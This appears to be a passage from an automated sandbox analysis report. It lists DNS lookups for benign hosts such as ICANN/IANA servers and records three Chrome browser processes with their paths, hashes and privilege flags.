Feb 7, 2023 18:22:39.398554087 CET | 8.8.8.8 | 192.168.2.4 | 0xd64b | No error (0) | 192.0.78.27 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:39.866036892 CET | 8.8.8.8 | 192.168.2.4 | 0x6456 | No error (0) | 93.184.216.34 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:52.941468954 CET | 8.8.8.8 | 192.168.2.4 | 0x6141 | No error (0) | ianawww.vip.icann.org | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:52.941468954 CET | 8.8.8.8 | 192.168.2.4 | 0x6141 | No error (0) | 192.0.46.8 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:53.467806101 CET | 8.8.8.8 | 192.168.2.4 | 0x43bb | No error (0) | ianawww.vip.icann.org | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:53.467806101 CET | 8.8.8.8 | 192.168.2.4 | 0x43bb | No error (0) | 192.0.46.8 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:57.594928980 CET | 8.8.8.8 | 192.168.2.4 | 0xafb5 | No error (0) | www.vip.icann.org | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:57.594928980 CET | 8.8.8.8 | 192.168.2.4 | 0xafb5 | No error (0) | 192.0.47.7 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:57.773257971 CET | 8.8.8.8 | 192.168.2.4 | 0xe24d | No error (0) | www.vip.icann.org | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:57.773257971 CET | 8.8.8.8 | 192.168.2.4 | 0xe24d | No error (0) | 192.0.47.7 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:23:00.099409103 CET | 8.8.8.8 | 192.168.2.4 | 0xb596 | No error (0) | ianawww.vip.icann.org | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:23:00.099409103 CET | 8.8.8.8 | 192.168.2.4 | 0xb596 | No error (0) | 192.0.46.8 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:23:38.765232086 CET | 8.8.8.8 | 192.168.2.4 | 0x7297 | No error (0) | 142.250.184.100 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:23:59.258929968 CET | 8.8.8.8 | 192.168.2.4 | 0x4850 | No error (0) | www.vip.icann.org | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:23:59.258929968 CET | 8.8.8.8 | 192.168.2.4 | 0x4850 | No error (0) | 192.0.47.7 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:23:59.588109016 CET | 8.8.8.8 | 192.168.2.4 | 0x1dec | No error (0) | www.vip.icann.org | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:23:59.588109016 CET | 8.8.8.8 | 192.168.2.4 | 0x1dec | No error (0) | 192.0.47.7 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:24:03.133151054 CET | 8.8.8.8 | 192.168.2.4 | 0x89fd | No error (0) | ianawww.vip.icann.org | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:24:03.133151054 CET | 8.8.8.8 | 192.168.2.4 | 0x89fd | No error (0) | 192.0.46.8 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:24:39.262686968 CET | 8.8.8.8 | 192.168.2.4 | 0x7109 | No error (0) | 142.250.184.100 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:24:39.403084040 CET | 8.8.8.8 | 192.168.2.4 | 0x37ce | No error (0) | 142.250.184.100 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:25:28.954996109 CET | 8.8.8.8 | 192.168.2.4 | 0x779b | No error (0) | ianawww.vip.icann.org | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:25:28.954996109 CET | 8.8.8.8 | 192.168.2.4 | 0x779b | No error (0) | 192.0.46.8 | A (IP address) | IN (0x0001) | false |
|
Click to jump to process
Target ID: | 0 |
Start time: | 18:22:31 |
Start date: | 07/02/2023 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff683680000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 1 |
Start time: | 18:22:33 |
Start date: | 07/02/2023 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff683680000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 2 |
Start time: | 18:22:35 |
Start date: | 07/02/2023 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff683680000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |